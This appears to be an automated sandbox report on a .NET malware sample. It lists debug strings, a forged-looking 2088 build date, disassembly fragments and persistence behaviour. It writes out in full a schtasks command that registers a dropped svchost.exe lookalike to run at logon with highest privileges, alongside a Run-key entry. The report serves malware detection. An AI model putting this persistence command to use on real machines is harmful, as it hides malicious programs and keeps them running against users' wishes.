Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: HFayo.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Xml.ni.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.ni.pdbRSDS source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: Microsoft.CSharp.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Drawing.ni.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Configuration.ni.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Dynamic.pdbp source: WERB646.tmp.dmp.21.dr
Source:	Binary string: Microsoft.CSharp.pdbX source: WERD632.tmp.dmp.29.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Configuration.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.pdb^ source: WERB646.tmp.dmp.21.dr
Source:	Binary string: System.pdbMZ source: WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Xml.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Core.ni.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Xml.pdbSystem.dll` source: WERB646.tmp.dmp.21.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Configuration.pdb8 source: WERD632.tmp.dmp.29.dr
Source:	Binary string: System.Drawing.pdb0 source: WERD632.tmp.dmp.29.dr
Source:	Binary string: mscorlib.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: Microsoft.CSharp.pdb0 source: WERB0D8.tmp.dmp.19.dr
Source:	Binary string: System.Dynamic.pdbH source: WERB0D8.tmp.dmp.19.dr
Source:	Binary string: System.Dynamic.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Drawing.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: mscorlib.ni.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: mscorlib.pdbU source: WERB646.tmp.dmp.21.dr
Source:	Binary string: System.pdb0#p source: WERB0D8.tmp.dmp.19.dr
Source:	Binary string: System.Core.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Drawing.pdb` source: WERB646.tmp.dmp.21.dr
Source:	Binary string: HFayo.pdbP/ source: WERB646.tmp.dmp.21.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: C:\Windows\Containers\Confidential\DotnetGenerator\Stub\Projects\HFayo\obj\Release\HFayo.pdb source: LisectAVT_2403002A_29.exe, svchost.exe.1.dr
Source:	Binary string: System.Configuration.pdbP source: WERB0D8.tmp.dmp.19.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Windows.Forms.pdb@ source: WERF524.tmp.dmp.36.dr
Source:	Binary string: System.ni.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr

Source: LisectAVT_2403002A_29.exe

Static PE information: 0xDF358803 [Tue Aug 31 21:49:55 2088 UTC]

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Code function: 1_2_00007FFD3466558A push ss; iretd	1_2_00007FFD34665617
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Code function: 1_2_00007FFD346500BD pushad ; iretd	1_2_00007FFD346500C1
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Code function: 1_2_00007FFD34663425 push ebp; iretd	1_2_00007FFD34663428
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Code function: 1_2_00007FFD347905E1 push esp; retf 4810h	1_2_00007FFD347908D2
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFD346800BD pushad ; iretd	9_2_00007FFD346800C1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFD347C082B push esp; retf 4810h	9_2_00007FFD347C08D2
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FFD346900BD pushad ; iretd	10_2_00007FFD346900C1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FFD346A3425 push ebp; iretd	10_2_00007FFD346A3428
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FFD347D082B push esp; retf 4810h	10_2_00007FFD347D08D2
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD34697563 push ebx; iretd	24_2_00007FFD3469756A
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD34697C2E pushad ; retf	24_2_00007FFD34697C5D
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD346655C2 push ss; iretd	24_2_00007FFD34665617
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD34663425 push ebp; iretd	24_2_00007FFD34663428
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD34684B7D push eax; ret	24_2_00007FFD34684BA4
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD346500BD pushad ; iretd	24_2_00007FFD346500C1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD3479082B push esp; retf 4810h	24_2_00007FFD347908D2
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346D7563 push ebx; iretd	31_2_00007FFD346D756A
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346D7C2E pushad ; retf	31_2_00007FFD346D7C5D
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346C4B7D push eax; ret	31_2_00007FFD346C4BA4
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346A55C1 push ss; iretd	31_2_00007FFD346A5617
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346A3425 push ebp; iretd	31_2_00007FFD346A3428
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346900BD pushad ; iretd	31_2_00007FFD346900C1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD347D082B push esp; retf 4810h	31_2_00007FFD347D08D2

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe

File created: C:\Users\user\AppData\Roaming\svchost.exe

Jump to dropped file

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe

File created: C:\Users\user\AppData\Roaming\svchost.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost			Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost			Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
